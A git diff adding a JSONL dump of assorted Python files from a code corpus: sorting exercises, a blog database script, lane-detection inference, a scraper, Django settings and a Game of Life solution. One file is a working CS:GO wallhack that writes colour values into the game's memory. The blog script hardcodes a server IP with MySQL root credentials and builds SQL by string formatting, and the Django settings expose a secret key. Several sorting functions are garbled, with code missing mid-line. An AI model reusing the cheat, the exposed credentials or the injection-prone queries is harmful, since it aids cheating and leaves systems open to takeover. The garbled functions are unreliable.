diff --git "a/841.jsonl" "b/841.jsonl" new file mode 100644--- /dev/null +++ "b/841.jsonl" @@ -0,0 +1,729 @@ +{"seq_id":"497019010","text":"from model import db, connect_to_db, User, Day\nfrom server import app\n\nif __name__ == \"__main__\":\n # As a convenience, if we run this module interactively, it will leave\n # you in a state of being able to work with the database directly.\n\n connect_to_db(app)\n # print \"Connected to DB.\"\n user = User.query.get(1).username\n with open('cron_db.txt', 'a') as f:\n f.write(user)\n # is_today_logged(1)\n","sub_path":"cron_code/test_cron_db.py","file_name":"test_cron_db.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"136245203","text":"def belong(n,t): #ok\r\n i=0\r\n while ires:\r\n res=element\r\n return res\r\n\r\ndef my_len(t): #ok\r\n cpt=0\r\n for element in t:\r\n cpt=cpt+1\r\n return cpt\r\n\r\ndef map_double(t): #ok\r\n res=[0]*len(t)\r\n for i in range (len(t)):\r\n res[i]=2*t[i]\r\n return res\r\n\r\ndef smallestin(t,i,j): #ok\r\n res=t[i]\r\n for indice in range(i+1,j+1):\r\n if t[indice]i:\r\n res[j-1]=t[j]\r\n return res\r\n\r\ndef my_selection_sent(t): #ok\r\n res=[0]*len(t)\r\n for i in range(len(t)):\r\n j=index_of_the_smallest(t)\r\n res=t[j]\r\n remove(t,j)\r\n\r\ndef index_of_the_smallest(t): #ok\r\n i=0\r\n j=1\r\n for elements in t:\r\n if t[i]=0 and t[i]>T:\r\n t[i+1]=t[i]\r\n i=i-1\r\n t[i+1]= T\r\n return t\r\n\r\ndef selection_sort_in_place(t): # ! Le tableau n'est pas trié !\r\n for i in range (len(t)):\r\n s=smallestin(t,i,len(t)-1)\r\n if s>i:\r\n swap(t,i,s)\r\n return None\r\n\r\ndef insert(t,i): #ok\r\n for current_index in range(i-1,-1,-1):\r\n if t[current_index] > t[current_index+1]:\r\n swap(t,current_index,current_index+1)\r\n else:\r\n break\r\n\r\ndef insertion_sort_in_place(t): #ok\r\n for i in range(1,len(t)):\r\n insert(t,i)\r\n\r\n\r\n\r\n\r\n","sub_path":"Toutes les fonctions vues en classe.py","file_name":"Toutes les fonctions vues en classe.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"604147512","text":"import time\nimport json\nfrom urllib import parse\nimport requests # install\nfrom bs4 import BeautifulSoup as bs # install\nimport pymysql # install\n\n\nua_baidu = 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'\nua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'\nheaders = {\n 'User-Agent': ua_baidu\n}\n\n\ndef get_ip_location1(ip):\n location = ''\n r = requests.get('http://www.ip138.com/ips138.asp?ip='+ip, headers=headers)\n r.encoding = 'gbk'\n soup = bs(r.text, 'html.parser')\n li = soup.find('ul').find('li').string\n location = li.split(':')[1]\n return location\n\n\ndef get_ip_location2(ip):\n location = ''\n r = requests.get(\n 'http://ip.taobao.com/service/getIpInfo.php?ip='+ip, headers=headers)\n d = json.loads(r.text)\n data = d['data']\n l = ''\n l += data['country']\n l += data['region']\n l += data['city']\n l += data['isp']\n return l\n\n\ndef get_ip_location(ip):\n location = ''\n r = requests.get('http://whois.pconline.com.cn/ipJson.jsp?ip=' +\n ip+'&json=true', headers=headers)\n d = json.loads(r.text)\n l = ''\n l += d['pro']\n l += d['city']\n l += d['addr']\n return l\n\n# ------------------------------数据库操作---------------------------------\n\n\nCONN_CONFIG = {\n 
'host': '120.79.180.139',\n 'user': 'root',\n 'password': '111111',\n 'database': 'blog'\n}\n\n\ndef update_ip():\n conn = pymysql.connect(**CONN_CONFIG)\n cursor = conn.cursor()\n sql = 'SELECT * FROM visitor'\n cursor.execute(sql)\n visitors = cursor.fetchall()\n for v in visitors:\n id = v[0]\n ip = v[1]\n location = v[6]\n if location == None or location == '' or location == ' ':\n sql = 'SELECT location FROM ip_location WHERE ip=\"'+ip+'\"'\n cursor.execute(sql)\n row = cursor.fetchone()\n if row == None: # 未查询到ip匹配的归属地\n l = get_ip_location(ip)\n sql = 'INSERT INTO ip_location(ip,location) VALUES (\"{}\",\"{}\")'.format(\n ip, l)\n cursor.execute(sql)\n conn.commit()\n sql = 'UPDATE visitor SET location=\"{}\" WHERE id=\"{}\"'.format(\n l, id)\n cursor.execute(sql)\n conn.commit()\n print(l)\n # time.sleep(10)\n\n cursor.close()\n conn.close()\n\n\ndef update_article():\n conn = pymysql.connect(**CONN_CONFIG)\n cursor = conn.cursor()\n sql = 'SELECT * FROM article'\n cursor.execute(sql)\n articles = cursor.fetchall()\n\n for article in articles:\n id = article[0]\n title = article[1]\n subtitle = article[2]\n tag = article[3]\n content = article[4]\n content = parse.unquote(content) #解码\n date = str(article[5])\n read_count = article[6]\n last_edit_date = article[7]\n author = article[8]\n author_id = article[9]\n sql='UPDATE article SET content=\"{}\" WHERE id=\"{}\"'.format(pymysql.escape_string(content),id)\n #sql = 'INSERT INTO article_(title,subtitle,tag,content,date,read_count,author,author_id) VALUES (\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'.format(\n #title, subtitle, tag, pymysql.escape_string(content), date, read_count, author, author_id)\n print(sql)\n cursor.execute(sql)\n conn.commit()\n print('修改文章成功:',title)\n\ndef update_comment():\n conn = pymysql.connect(**CONN_CONFIG)\n cursor = conn.cursor()\n sql = 'SELECT * FROM comment'\n cursor.execute(sql)\n comments = cursor.fetchall()\n\n for comment in comments:\n id=comment[0]\n article_id=comment[1]\n replyname=comment[2]\n replyname = parse.unquote(replyname) #解码\n content=comment[3]\n content = parse.unquote(content) #解码\n sql='UPDATE comment SET replyname=\"{}\",content=\"{}\" WHERE id=\"{}\"'.format(pymysql.escape_string(replyname),pymysql.escape_string(content),id)\n print(sql)\n cursor.execute(sql)\n conn.commit()\n print('修改评论成功:',article_id)\n\n# update_ip()\n# l=get_ip_location3(\"221.204.148.219\")\n# print(l)\n#update_article()\n#update_comment()\n","sub_path":"app/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"558806266","text":"import pymem\r\nimport pymem.process\r\nimport keyboard\r\nimport time\r\nimport re\r\nfrom Offsets import *\r\n\r\ndef main():\r\n pm = pymem.Pymem(\"csgo.exe\")\r\n client = pymem.process.module_from_name(pm.process_handle, \"client.dll\").lpBaseOfDll\r\n engine = pymem.process.module_from_name(pm.process_handle, \"engine.dll\").lpBaseOfDll\r\n\r\n rgba = [0, 255, 0]\r\n \r\n while True:\r\n\r\n try:\r\n time.sleep(0.001)\r\n for i in range(32):\r\n entity = pm.read_int(client + dwEntityList + i * 0x10)\r\n if entity:\r\n entity_team_id = pm.read_int(entity + m_iTeamNum)\r\n player = pm.read_int(client + dwLocalPlayer)\r\n player_team = pm.read_int(player + m_iTeamNum)\r\n if entity_team_id != player_team :\r\n pm.write_int(entity + m_clrRender, (rgba[0]))\r\n pm.write_int(entity + m_clrRender + 0x1, (rgba[1]))\r\n pm.write_int(entity + 
m_clrRender + 0x2, (rgba[2]))\r\n\r\n else:\r\n \tpass\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"utils/chams.py","file_name":"chams.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"592361635","text":"import os\nimport json\nfrom datetime import datetime\nfrom statistics import mean\nimport argparse\n\nimport numpy as np\nimport cv2\nfrom sklearn.metrics import accuracy_score, f1_score\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom datasets.llamas import Llamas, match_multi_class, get_lanes_culane, get_lanes_llamas\nfrom models.dla.pose_dla_dcn import get_pose_net\nfrom models.erfnet.erfnet import ERFNet\nfrom models.enet.ENet import ENet\nfrom utils.affinity_fields import decodeAFs\nfrom utils.visualize import tensor2image, create_viz\n\n\nparser = argparse.ArgumentParser('Options for inference with LaneAF models in PyTorch...')\nparser.add_argument('--dataset-dir', type=str, default=None, help='path to dataset')\nparser.add_argument('--output-dir', type=str, default=None, help='output directory for model and logs')\nparser.add_argument('--snapshot', type=str, default=None, help='path to pre-trained model snapshot')\nparser.add_argument('--seed', type=int, default=1, help='set seed to some constant value to reproduce experiments')\nparser.add_argument('--no-cuda', action='store_true', default=False, help='do not use cuda for training')\nparser.add_argument('--save-viz', action='store_true', default=False, help='save visualization depicting intermediate and final results')\n\nargs = parser.parse_args()\n# check args\nif args.dataset_dir is None:\n assert False, 'Path to dataset not provided!'\nif args.snapshot is None:\n assert False, 'Model snapshot not provided!'\n\n# set batch size to 1 for visualization purposes\nargs.batch_size = 1\n\n# setup args\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\nif args.output_dir is None:\n args.output_dir = datetime.now().strftime(\"%Y-%m-%d-%H:%M-infer\")\n args.output_dir = os.path.join('.', 'experiments', 'llamas', args.output_dir)\n\nif not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\nelse:\n assert False, 'Output directory already exists!'\n\n# load args used from training snapshot (if available)\nif os.path.exists(os.path.join(os.path.dirname(args.snapshot), 'config.json')):\n with open(os.path.join(os.path.dirname(args.snapshot), 'config.json')) as f:\n json_args = json.load(f)\n # augment infer args with training args for model consistency\n if 'backbone' in json_args.keys():\n args.backbone = json_args['backbone']\n else:\n args.backbone = 'dla34'\n\n# store config in output directory\nwith open(os.path.join(args.output_dir, 'config.json'), 'w') as f:\n json.dump(vars(args), f)\n\n# set random seed\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n\nkwargs = {'batch_size': args.batch_size, 'shuffle': False, 'num_workers': 1}\ntest_loader = DataLoader(Llamas(args.dataset_dir, 'test', False), **kwargs)\n\n# create file handles\nf_log = open(os.path.join(args.output_dir, \"logs.txt\"), \"w\")\n\n# get test set filenames\nfilenames_culane = [os.path.join(args.output_dir, x[len(args.dataset_dir):]) for x in test_loader.dataset.img_list]\nfilenames_culane = [x.replace('color_images', 'outputs_culane').replace('_color_rect.png', '.lines.txt') for x in filenames_culane]\nfilenames_llamas = 
['/'.join(x.split('/')[-2:]) for x in test_loader.dataset.img_list]\noutputs_dict = dict()\n\n\n# test function\ndef test(net):\n net.eval()\n out_vid = None\n\n for b_idx, sample in enumerate(test_loader):\n input_img, _, _, _ = sample\n if args.cuda:\n input_img = input_img.cuda()\n\n # do the forward pass\n outputs = net(input_img)[-1]\n\n # convert to arrays\n img = tensor2image(input_img.detach(), np.array(test_loader.dataset.mean), \n np.array(test_loader.dataset.std))\n mask_out = tensor2image(torch.sigmoid(outputs['hm']).repeat(1, 3, 1, 1).detach(), \n np.array([0.0 for _ in range(3)], dtype='float32'), np.array([1.0 for _ in range(3)], dtype='float32'))\n vaf_out = np.transpose(outputs['vaf'][0, :, :, :].detach().cpu().float().numpy(), (1, 2, 0))\n haf_out = np.transpose(outputs['haf'][0, :, :, :].detach().cpu().float().numpy(), (1, 2, 0))\n\n # decode AFs to get lane instances\n seg_out = decodeAFs(mask_out[:, :, 0], vaf_out, haf_out, fg_thresh=128, err_thresh=5)\n\n # re-assign lane IDs to match with ground truth\n seg_out = match_multi_class(seg_out.astype(np.int64))\n\n # get results in CULane output structure\n xy_coords = get_lanes_culane(seg_out, test_loader.dataset.samp_factor)\n # write CULane results to file\n if not os.path.exists(os.path.dirname(filenames_culane[b_idx])):\n os.makedirs(os.path.dirname(filenames_culane[b_idx]))\n with open(filenames_culane[b_idx], 'w') as f:\n f.write('\\n'.join(' '.join(map(str, _lane)) for _lane in xy_coords))\n\n # get results in Llamas output structure\n lanes_dict = get_lanes_llamas(seg_out, test_loader.dataset.samp_factor)\n # store Llamas results to dict\n outputs_dict[filenames_llamas[b_idx]] = lanes_dict\n\n # create video visualization\n if args.save_viz:\n img_out = create_viz(img, seg_out.astype(np.uint8), mask_out, vaf_out, haf_out)\n\n if out_vid is None:\n out_vid = cv2.VideoWriter(os.path.join(args.output_dir, 'out.mkv'), \n cv2.VideoWriter_fourcc(*'H264'), 5, (img_out.shape[1], img_out.shape[0]))\n out_vid.write(img_out)\n\n print('Done with image {} out of {}...'.format(min(args.batch_size*(b_idx+1), len(test_loader.dataset)), len(test_loader.dataset)))\n\n # write Llamas results to file\n with open(os.path.join(args.output_dir, 'outputs_llamas.json'), 'w') as f:\n json.dump(outputs_dict, f)\n\n if args.save_viz:\n out_vid.release()\n\n return\n\nif __name__ == \"__main__\":\n heads = {'hm': 1, 'vaf': 2, 'haf': 1}\n if args.backbone == 'dla34':\n model = get_pose_net(num_layers=34, heads=heads, head_conv=256, down_ratio=4)\n elif args.backbone == 'erfnet':\n model = ERFNet(heads=heads)\n elif args.backbone == 'enet':\n model = ENet(heads=heads)\n\n model.load_state_dict(torch.load(args.snapshot), strict=True)\n if args.cuda:\n model.cuda()\n print(model)\n\n test(model)\n","sub_path":"infer_llamas.py","file_name":"infer_llamas.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"107783377","text":"from symnum import symToNum\nfrom os import system\nfrom math import ceil\nfrom addCommas import addCommas\n\ndef calculateCost(cost, upgrades): \n RATE = 1.2\n totalCost = 0\n print(\"Upgrade \\t Cost\")\n for i in range(0,upgrades):\n print(\" %d \\t\\t %s\"%((i+1),addCommas(ceil(cost))))\n totalCost+=cost\n cost*=RATE\n totalCost = ceil(totalCost)\n print(\"Total \\t\\t\" + addCommas(totalCost))\n return totalCost\n \n\nexit = False\n\nwhile (exit==False):\n system(\"clear\")\n inputs = input(\"Enter skill costs(any letter to 
quit):\").split(\",\")\n \n for i in range(0, len(inputs)):\n inputs[i] = symToNum(inputs[i])\n if((len(inputs)==1 and str.isalpha(str(inputs[0]))) or len(inputs)==0):\n exit = True\n continue\n \n n = (input(\"Number of upgrades left:\")).split(\",\")\n \n if(len(inputs)!=len(n)):\n print(\"Unequal argument lengths\\nExiting...\")\n exit = True\n continue\n sumTotal = 0 \n for i in range(0,len(inputs)):\n if(str.isdigit(str(inputs[i])) and str.isdigit(n[i])):\n cost = inputs[i]\n upgrades = int(n[i])\n sumTotal+= calculateCost(cost, upgrades)\n print()\n else:\n exit = True\n continue\n print(\"\\nAggregate cost \\t\" + addCommas(sumTotal))\n input()\n ","sub_path":"Code/Pers/Python/stickmanLegendsSkill.py","file_name":"stickmanLegendsSkill.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"159901618","text":"from pymongo import MongoClient\nimport redis\nfrom selenium import webdriver\n\n\nclass FeiPinW(object):\n\n def __init__(self):\n self.base_url = \"http://www.feipinzhan.com/company/index.php?catid=0&areaid=0&groupid=&page={}\"\n # chrome_options = webdriver.ChromeOptions()\n # chrome_options.add_argument('--headless')\n # self.driver = webdriver.Chrome(chrome_options=chrome_options)\n self.driver = webdriver.Firefox()\n self.Host = \"127.0.0.1\"\n self.Port = 27017\n self.rPort = 6379\n self.conn = MongoClient(host=self.Host, port=self.Port)\n self.rConn = redis.Redis(host=self.Host, port=self.rPort)\n\n def parse_page(self):\n \"\"\"\n 解析数据\n :return:\n \"\"\"\n company_list = self.driver.find_elements_by_xpath('//*[@class=\"cb insetpaix\"]/div[2]/h2/a')\n number_list = self.driver.find_elements_by_xpath('//*[@class=\"cb insetpaix\"]/div[3]/div[3]/span[1]')\n address_list = self.driver.find_elements_by_xpath('//*[@class=\"cb insetpaix\"]/div[2]/dl/dt[2]')\n type_list = self.driver.find_elements_by_xpath('//*[@class=\"cb insetpaix\"]/div[2]/dl/dt[3]')\n item_list = list()\n length = len(company_list)\n for i in range(length):\n try:\n item = dict()\n item['company'] = company_list[i].text\n item['number'] = number_list[i].text\n item['address'] = address_list[i].text.replace('公司地址:', '')\n item['type'] = type_list[i].text.replace('经营范围:', '')\n item_list.append(item)\n except Exception as e:\n print(e)\n pass\n return item_list\n\n def save_data(self, data):\n \"\"\"\n 保存数据\n :param data:\n :return:\n \"\"\"\n try:\n db = self.conn.FeiPinZ\n col = db.FP\n col.insert(data)\n print(data)\n except Exception as e:\n print(e)\n\n def run(self):\n for i in range(1, 78):\n url = self.base_url.format(i)\n self.driver.get(url)\n self.driver.implicitly_wait(6)\n data_list = self.parse_page()\n for data in data_list:\n self.save_data(data)\n\n\nif __name__ == '__main__':\n FW = FeiPinW()\n FW.run()","sub_path":"August/FeiPin/FeiPinZhan.py","file_name":"FeiPinZhan.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"381304500","text":"from tkinter import ttk\n\nfrom servis.izvestaji.sopstveni_izvestaj_lekara_servis import poziv_forme_za_prikaz_izvestaja\n\n\nclass FormaIzvestajaLekara:\n\n\n def __init__(self,root,korisnik):\n self._root = root\n self._korisnik = korisnik\n ttk.Label(self._root,text = \"Unesi broj dana za izvestaj: \").pack()\n self.unos = ttk.Entry(self._root)\n self.unos.pack()\n self.dugme = ttk.Button(self._root,text = \"Stampaj izvestaj\",command = self.generisi).pack()\n\n def 
generisi(self):\n broj_dana = int(self.unos.get())\n poziv_forme_za_prikaz_izvestaja(self._korisnik,broj_dana)\n\n\ndef poziv_forme_za_izvestaj_lekara_sopstveni(root,korisnik):\n FormaIzvestajaLekara(root,korisnik)\n root.mainloop()\n","sub_path":"gui/lekar/generisanje_izvestaja.py","file_name":"generisanje_izvestaja.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"413803595","text":"class Solution:\n def gameOfLife(self, board):\n \"\"\"\n @param board: List[List[int]] = Board representing the cells\n 1 represents live cell,\n 0 represents dead cell\n :return: void => we are modifying board in-place.\n \"\"\"\n if len(board) == 0 or len(board[0]) == 0:\n return\n\n def find_live_neighbor(board, i, j):\n count = 0\n directions = [[i - 1, j - 1], [i - 1, j], [i - 1, j + 1], \\\n [i + 1, j - 1], [i + 1, j], [i + 1, j + 1], \\\n [i, j - 1], [i, j + 1]]\n\n for x, y in directions:\n if x >= 0 and x < len(board) and y >= 0 and y < len(board[0]) and board[x][y] % 2 == 1:\n count += 1\n\n return count\n\n for j in range(len(board[0])):\n for i in range(len(board)):\n ct_of_live_neighbors = find_live_neighbor(board, i, j)\n if (board[i][j] == 0 and ct_of_live_neighbors == 3) or (\n board[i][j] == 1 and ct_of_live_neighbors in [2, 3]):\n board[i][j] |= 2\n\n for j in range(len(board[0])):\n for i in range(len(board)):\n board[i][j] >>= 1\n\n return\n\n","sub_path":"LeetCode/0289_GameOfLife/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"653413112","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 6 13:34:52 2017\n\n@author: alex\n\"\"\"\nimport pandas as pd\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom xgboost.sklearn import XGBRegressor # Sklearn wrapper for XGboost (similar param names)\n\n# --- Load CSVs --- #\nos.chdir('C:/Users/alex/Documents/Mercedes-Kaggle')\n\nX_enc = pd.read_csv('X_enc.csv')\nX_enc = X_enc.set_index('ID')\nX_enc = X_enc.values\ny = pd.read_csv('y.csv', header = None)\ny = y.set_index(0)\ny = y.values.flatten()\n\nX_train, X_test, y_train, y_test = train_test_split(X_enc, y, test_size=0.2, random_state=0)\n\nxgb_1 = XGBRegressor(n_estimators = 100)\nxgb_1.fit(X_train, y_train)\nxgb_1.score(X_train, y_train)\nxgb_1.score(X_test, y_test)\n\nxgb_manytrees = XGBRegressor(n_estimators = 1000)\nxgb_manytrees.fit(X_train, y_train)\nxgb_manytrees.score(X_train, y_train)\nxgb_manytrees.score(X_test, y_test)\n\nxgb_manytrees = XGBRegressor(n_estimators = 500)\nxgb_manytrees.fit(X_train, y_train)\nxgb_manytrees.score(X_train, y_train)\nxgb_manytrees.score(X_test, y_test)\n\n# Crude optimization\nxgb_ = XGBRegressor()\nxgb_grid = GridSearchCV(xgb_,\n {'max_depth': np.arange(1,30, 10),\n 'n_estimators': np.arange(1,5)*100}, n_jobs = 2, verbose=1)\n\nxgb_grid.fit(X_train, y_train)\nprint(xgb_grid.cv_results_['mean_train_score'])\nprint(xgb_grid.cv_results_['mean_test_score'])","sub_path":"Xgboost_basic.py","file_name":"Xgboost_basic.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"69012727","text":"# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nimport 
sys\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'oisd#zb6@ns9gg8jb$pc=&_bnr9gbwt+e=xs(%(g_5wqs4y%ga'\n\nDEBUG = os.environ.get('DEBUG') == '1'\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = ['*']\n\nINTERNAL_IPS = ('127.0.0.1', '172.17.42.1', )\n\n\n# Application definition\nAUTH_USER_MODEL = 'authentication.Account'\n\nLOGIN_REDIRECT_URL = '/'\nLOGIN_URL = '/login'\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'pipeline',\n 'authentication',\n 'rest_auth',\n 'rest_framework',\n 'rest_framework.authtoken',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'app.urls'\n\nWSGI_APPLICATION = 'app.wsgi.application'\n\n\n# Debug toolbar\nif DEBUG:\n INSTALLED_APPS += ('debug_toolbar', )\n MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware', )\n\n\n# Database\nif 'RDS_DB_NAME' in os.environ:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': os.environ['RDS_DB_NAME'],\n 'USER': os.environ['RDS_USERNAME'],\n 'PASSWORD': os.environ['RDS_PASSWORD'],\n 'HOST': os.environ['RDS_HOSTNAME'],\n 'PORT': os.environ['RDS_PORT'],\n }\n }\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n }\n\n\n# Internationalization\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'pipeline.finders.PipelineFinder',\n)\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), 'collected_static')\n\n\n# Email settings\nif DEBUG:\n EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nEMAIL_HOST = ''\nEMAIL_HOST_USER = ''\nEMAIL_HOST_PASSWORD = ''\nEMAIL_PORT = 25\nEMAIL_USE_TLS = False\nEMAIL_USE_SSL = False\nDEFAULT_FROM_EMAIL = ''\n\n\n# Pipeline static\nif not DEBUG:\n PIPELINE_ENABLED = True\n PIPELINE_DISABLE_WRAPPER = True\nSTATICFILES_STORAGE = 'pipeline.storage.PipelineStorage'\nPIPELINE_CSS_COMPRESSOR = ''\nPIPELINE_JS_COMPRESSOR = ''\n\nPIPELINE_CSS = {\n 'styles': {\n 'source_filenames': (\n 'assets/css/fonts/linecons/css/linecons.css',\n 'assets/css/fonts/fontawesome/css/font-awesome.min.css',\n 'assets/css/bootstrap.min.css',\n 'assets/css/bootstrap-theme.min.css',\n 'assets/css/select.min.css',\n 'assets/css/loading-bar.min.css',\n 'assets/css/angular-toastr.min.css',\n 'style/style.css'\n ),\n 'output_filename': 'styles.css',\n }\n}\n\nPIPELINE_JS = {\n 'assets': {\n 'source_filenames': (\n 'assets/js/jquery.min.js',\n 'assets/js/jquery-ui.min.js',\n 'assets/js/angular.min.js',\n 'assets/js/*.js',\n ),\n 'output_filename': 'assets.js',\n },\n 'app': {\n 'source_filenames': (\n 'app/djangoapp.js',\n 
'app/directives/directives.js',\n 'app/directives/**/*.js',\n 'app/services/services.js',\n 'app/services/**/*.js',\n 'app/filters/filters.js',\n 'app/filters/*.js',\n 'app/layout/layout.js',\n 'app/layout/**/*.js',\n 'app/layout/**/**/*.js',\n 'app/demos/demos.js',\n 'app/demos/**/*.js',\n 'app/demos/**/**/*.js',\n 'app/authentication/authentication.js',\n 'app/authentication/**/*.js',\n ),\n 'output_filename': 'app.js',\n }\n}\n\n\n# Templates\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n ],\n 'OPTIONS': {\n 'context_processors': [\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'app.context_processors.app_processors',\n ],\n 'loaders': [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n ]\n },\n },\n]\n\n\n# Websocket\nWEBSOCKET_URL = 'ws://{}:{}/'.format(\n os.environ.get('NODEWS_PORT_8080_TCP_ADDR'),\n os.environ.get('NODEWS_PORT_8080_TCP_PORT')\n)\n\n\n# Logging\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'detail': {\n 'format': (\n '%(levelname)s %(asctime)s %(pathname)s:%(lineno)s '\n '[%(funcName)s] %(message)s')\n }\n },\n 'handlers': {\n 'stdout': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'detail',\n 'stream': sys.stdout\n }\n },\n 'loggers': {\n 'django': {\n 'handlers': ['stdout'],\n 'level': 'INFO',\n },\n '': {\n 'handlers': ['stdout'],\n 'level': 'INFO',\n }\n }\n}\n","sub_path":"app/app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"107241033","text":"import matplotlib.pyplot as plt\n\nX, Y = [], []\nZ=[]\nfor count,line in enumerate(open('datapoints', 'r')):\n\tif count % 2 == 1:\n\t\tvalues = [float(s) for s in line.split()]\n\t\tX.append(values[0])\n\tif count % 2 == 0:\n\t\tvalues = [float(s) for s in line.split()]\n\t\tY.append(values[0])\n\n#print(X[:10])\n#print(Y[:10])\nfor i in range(len(X)):\n\tZ.append(X[i]*Y[i])\n\nanswer = min(Z)\nplace = Z.index(answer)\nprint('Lowest energy is: '+str(answer))\nprint('Optimal Point has Area: '+str(X[place]))\nprint('Optimal Point has Delay: '+str(Y[place]))\n\nplt.title(\"Delay Area curve\")\nplt.plot(X, Y, 'ro', c='blue',ms='0.50',label='Design Space')\nplt.xlabel(\"Area (units)\")\nplt.ylabel(\"Delay (Geometric Mean)\")\nplt.plot(X[place],Y[place],'bx', c='red',label='Pareto point')\nplt.plot('125444','1','^', c='black',label='Reference')\n#plt.scatter(X, Y, s=None, c=None, marker=None, cmap=None, norm=None, vmin=None, vmax=None, alpha=None)\nplt.autoscale(enable=True, axis='both', tight=None)\nplt.legend()\nplt.show()","sub_path":"Lab1/Scripts/plot1.py","file_name":"plot1.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"54140100","text":"class Solution(object):\n\tdef largestNumber(self, nums):\n\t\t\"\"\"\n\t\t:type nums: List[int]\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tdef compare(x, y):\n\t\t\tif x == y:\n\t\t\t\treturn 0\n\t\t\telif x.startswith(y):\n\t\t\t\tz = y + 
